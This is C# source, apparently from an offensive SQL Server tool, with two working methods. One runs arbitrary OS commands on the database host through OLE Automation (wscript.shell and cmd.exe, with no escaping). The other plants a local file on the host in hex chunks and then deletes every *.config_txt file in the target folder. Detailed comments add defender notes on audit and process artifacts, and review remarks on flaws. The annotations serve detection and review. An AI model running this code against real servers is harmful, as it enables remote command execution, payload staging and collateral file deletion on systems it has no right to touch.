/// <summary>
/// Runs an OS command on the SQL Server host through OLE Automation
/// (sp_OACreate 'wscript.shell' -> Exec cmd.exe /c) and prints whatever the
/// process wrote to StdOut. Despite the name this does not use xp_cmdshell;
/// it depends on the 'Ole Automation Procedures' server option instead.
/// Defender note: detection for this path keys on sp_OACreate/sp_OAMethod
/// activity in the SQL audit trail, on 'Ole Automation Procedures' being
/// switched on via sp_configure, and on cmd.exe being spawned by the SQL
/// Server service process (typically sqlservr.exe). Keeping the option
/// disabled and not granting sysadmin to application logins closes the path.
/// </summary>
/// <param name="Command">Command line passed verbatim to cmd.exe /c. It is
/// substituted into a single-quoted T-SQL literal with no escaping.</param>
public void sp_cmdshell(String Command)
{
    // Check_configuration / Enable_ola are project helpers not visible here.
    // As written: when the option check is true (value 0 = reported off) and
    // Enable_ola() returns true, the method gives up; otherwise it proceeds.
    // NOTE(review): whether a true return from Enable_ola() means "could not
    // enable" or "enabled" cannot be determined from this file — confirm.
    if (setting.Check_configuration("Ole Automation Procedures", 0))
    {
        if (setting.Enable_ola())
        {
            return;
        }
    }
    // T-SQL batch: create WScript.Shell, Exec cmd.exe /c <Command>, read the
    // child's StdOut (ReadAll) into @str and return it as a one-row result.
    var sqlstr = String.Format(@" declare @shell int,@exec int,@text int,@str varchar(8000); exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'exec',@exec output,'c:\windows\system32\cmd.exe /c {0}' exec sp_oamethod @exec, 'StdOut', @text out; exec sp_oamethod @text, 'ReadAll', @str out select @str", Command);
    // Batch.RemoteExec is a project helper; its return value is printed
    // directly, so it presumably yields the result set as text when the
    // third argument is true — confirm against Batch.
    Console.WriteLine(Batch.RemoteExec(Conn, sqlstr, true));
}
/// <summary>
/// Copies a local file onto the SQL Server host using OLE Automation
/// (ADODB.Stream). The file is hex-encoded, split into 150000-hex-character
/// chunks (75000 bytes each), each chunk is written to
/// '&lt;remoteFile&gt;_N.config_txt' with SaveToFile, then a wscript.shell
/// 'run' of cmd.exe /c 'copy /b' joins the chunks into remoteFile and a second
/// cmd.exe /c 'del' removes every *.config_txt in the target directory.
/// Requires the 'Ole Automation Procedures' option to be enabled.
/// Defender note: on-disk artifacts are the transient *_N.config_txt chunks and
/// the final file; process artifacts are cmd.exe (copy / del) launched by the
/// SQL Server service process; SQL-side artifacts are sp_OACreate 'ADODB.Stream'
/// batches carrying large 0x… binary literals. The del step is not scoped to
/// this upload's chunk files — any *.config_txt in that directory is removed.
/// </summary>
/// <param name="localFile">Path of the file to read on this machine.</param>
/// <param name="remoteFile">Destination path on the SQL Server host; chunk
/// files are created beside it and removed afterwards.</param>
public void UploadFiles(String localFile, String remoteFile)
{
    Console.WriteLine(String.Format("[*] Uploading '{0}' to '{1}'...", localFile, remoteFile));
    // Same option check as sp_cmdshell; Check_configuration / Enable_ola are
    // project helpers not visible here — confirm their true/false meaning.
    if (setting.Check_configuration("Ole Automation Procedures", 0))
    {
        if (setting.Enable_ola())
        {
            return;
        }
    }
    int count = 0;
    try
    {
        // Whole file as an uppercase hex string; this doubles the size in memory
        // and is what the 0x{0} literal below needs.
        string hexString = string.Concat(File.ReadAllBytes(localFile).Select(b => b.ToString("X2")));
        // GetSeparateSubString is defined elsewhere in the project. Each chunk is
        // assumed to be an even number of hex digits so that 0x{0} is a valid
        // binary literal — 150000 is even, but confirm the helper's behavior.
        ArrayList arrlist = GetSeparateSubString(hexString, 150000);
        foreach (string hex150000 in arrlist)
        {
            count++;
            string filePath = String.Format("{0}_{1}.config_txt", remoteFile, count);
            // sqlstr is not declared in this method, so it must be a field of the
            // enclosing class (not visible here).
            // T-SQL batch: ADODB.Stream in binary mode (Type = 1), Write the chunk,
            // SaveToFile with mode 2 (overwrite), Close, destroy the object.
            sqlstr = String.Format(@" DECLARE @ObjectToken INT EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT EXEC sp_OASetProperty @ObjectToken, 'Type', 1 EXEC sp_OAMethod @ObjectToken, 'Open' EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x{0} EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL,'{1}', 2 EXEC sp_OAMethod @ObjectToken, 'Close' EXEC sp_OADestroy @ObjectToken", hex150000, filePath);
            Batch.RemoteExec(Conn, sqlstr, false);
            if (setting.File_Exists(filePath))
            {
                Console.WriteLine("[+] {0}-{1} Upload completed", arrlist.Count, count);
            }
            else
            {
                // A missing chunk aborts the whole process; note that already-written
                // chunk files are left on the host and the exit code is 0 (success).
                Console.WriteLine("[!] {0}-{1} Error uploading", arrlist.Count, count);
                Conn.Close();
                Environment.Exit(0);
            }
            // Fixed 5 s pause between chunks; no visible reason in this file.
            Thread.Sleep(5000);
        }
        // Prefix of the cmd.exe /c batch; the closing quote of the T-SQL literal is
        // supplied by the last segment of sqlstr below (and by the del string).
        string shell = String.Format(@" DECLARE @SHELL INT EXEC sp_oacreate 'wscript.shell', @SHELL OUTPUT EXEC sp_oamethod @SHELL, 'run' , NULL, 'c:\windows\system32\cmd.exe /c ");
        // Build: copy /b <remoteFile>_1.config_txt+<remoteFile>_2.config_txt+... <remoteFile>'
        sqlstr = "copy /b ";
        for (int i = 1; i < count + 1; i++)
        {
            if (i != count)
            {
                sqlstr += String.Format(@"{0}_{1}.config_txt+", remoteFile, i);
            }
            else
            {
                sqlstr += String.Format(@"{0}_{1}.config_txt {0}'", remoteFile, i);
            }
        }
        Console.WriteLine(@"[+] copy /b {0}_x.config_txt {0}", remoteFile);
        Batch.RemoteExec(Conn, shell + sqlstr, false);
        Thread.Sleep(5000);
        // Directory of remoteFile is derived by stripping the file name; the
        // resulting wildcard matches all *.config_txt files there, not just ours.
        sqlstr = String.Format(@"del {0}*.config_txt'", remoteFile.Replace(Path.GetFileName(remoteFile), ""));
        Console.WriteLine("[+] {0}", sqlstr.Replace("'", ""));
        Batch.RemoteExec(Conn, shell + sqlstr, false);
        // Only success is reported; a missing final file produces no message.
        if (setting.File_Exists(remoteFile))
        {
            Console.WriteLine("[*] '{0}' Upload completed", localFile);
        }
    }
    catch (Exception ex)
    {
        // Catch-all: the connection is closed and only the message is printed;
        // the exception is not rethrown, so callers cannot observe the failure.
        Conn.Close();
        Console.WriteLine("[!] Error log: \r\n" + ex.Message);
    }
}